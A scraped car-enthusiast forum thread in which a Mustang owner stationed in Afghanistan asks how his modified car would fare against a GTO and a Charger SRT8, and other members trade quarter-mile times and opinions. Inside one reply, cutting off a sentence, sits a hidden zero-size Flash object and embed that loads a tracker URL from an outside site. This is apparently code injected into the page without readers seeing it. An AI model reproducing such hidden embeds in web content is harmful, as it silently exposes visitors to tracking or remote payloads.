More people talkin ****

mattstang2007

Jun 7, 2009
SO i am here in afganistan and soooooo many people hate on mustangs its not funny. I got these two guys talkin more **** then the first guy i posted. one has a k&n intake and magna flow catback 05 gto, and a charger srt8 stock. how would i do agianst these two cars? here is what i have:
BBk ceramic coated longtube headers, x pipe no cats and boom tubes
hurst comp shifter
aluminum drive shaft
nitto 555 all around with 18 inch fr500 rims
steeda lower control arms, panhard bar and lowering springs
under drive pullies
C&L CAI with brenspeed 91 tune
160 termostat
3.31 gears

sorry for bench racing, however i definitly cant race for a while cause i am stuck in the desert. thanks for the imput guys

• Sponsors (?)

i've noticed alot of people that go out looking for races, suck at driving. if you have any kind of seat time at the track and you race at the track, i think you'll do fine.

i beat a srt-8 charger. he ran like 13.8. auto. don't think anything was done to it, maybe exhaust. he was running consistant 13.8 too. forget his trap speed.

the gtos, they are quick, around 400horses. i raced one but the guy like missed 2nd or something, i forget what happened.

they run around 13.0 at 109 bone stock, but thats with a good driver. alot of modified ones i see running mid 12s, but thats like cams full exhaust geared etc.

Yeah I agree if you can shift youll win. The GTO is a biiiiiiggggg b**ch. Its way heavy. I have seen mustangs beath the hell out of GTO's up to a certain speed. Itd start pulling at about 135 MP or so. The SRT8 youd probably beat but depends on driving. How can you even hate on mustangs, theyre history and are gorgeous! Haha

the GTO will beat you , the charger depends on the driver. Race talking on paper is like Motor trend declaring the Mustang the winner over the challenger and the Camaro. I'm sorry but a 13.0 Camaro beats a 13.6 or 7 Mustang most days of any week. The Mustang has always been a platform, that meaning , you buy a Mustang and make it what you want. There will ALWAYS be someone on the street that will beat you by 10 car lengths, no matter what you have.

If they keep talking trash, just ask the GTO owner why if his car is so great, they no longer make them and had to give away half of the ones they did make? As for the Charger, I actually think they are pretty cool looking cars. But everyone that owns one seems to think they are significantly faster than they actually are. I guess the extra 1000 lbs on that sedan doesn't mean anything since it shares the name with a fast coupe from the 60's...

stangdude2000;7954645[B said:
]If they keep talking trash, just ask the GTO owner why if his car is so great, they no longer make them and had to give away half of the ones they did make[/B]? As for the Charger, I actually think they are pretty cool looking cars. But everyone that owns one seems to think they are significantly faster than they actually are. I guess the extra 1000 lbs on that sedan doesn't mean anything since it shares the name with a fast coupe from the 60's...

because when they first tried to sell them they were outrageously priced, like alot of GM sportscars haha.

we've got some low mileage ones at my dealership and they are selling for 22k or so. and we seem to be selling them quick.

if
gto.jpg

didnt look like
000_0373.jpg

i think it would of did better.

my brother in laws 05 gto m6 went 13.0@108 bone stock to give you an idea as mentioned above...so they are quite capable of holding their own. With your mods i'd hope you'd be somewhere around there with decent driving...IMO it would be a drivers race with the GTO. The charger doesn't count, something isn't right if he beats you ;)

If you can shift then you'll destroy both cars. When my GT was bone stock I raced a 6.0 GTO with exhaust mods and kept up with him, with your mods you should be somewhere around my E.T. of low 13's wich a GTO and an SRT-8 Are not<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Agreed, both those cars are heavy heavy.

because when they first tried to sell them they were outrageously priced, like alot of GM sportscars haha.

we've got some low mileage ones at my dealership and they are selling for 22k or so. and we seem to be selling them quick.

if
gto.jpg

didnt look like
000_0373.jpg

i think it would of did better.

YES!!! i thought i was the only one who saw the resemblance.

couldn't agree more. if you're going to call it a GTO, which reminds everybody of a late 60s musclecar that was respectable, why would you water down the name's shock value by putting the badge on a hooptie like that...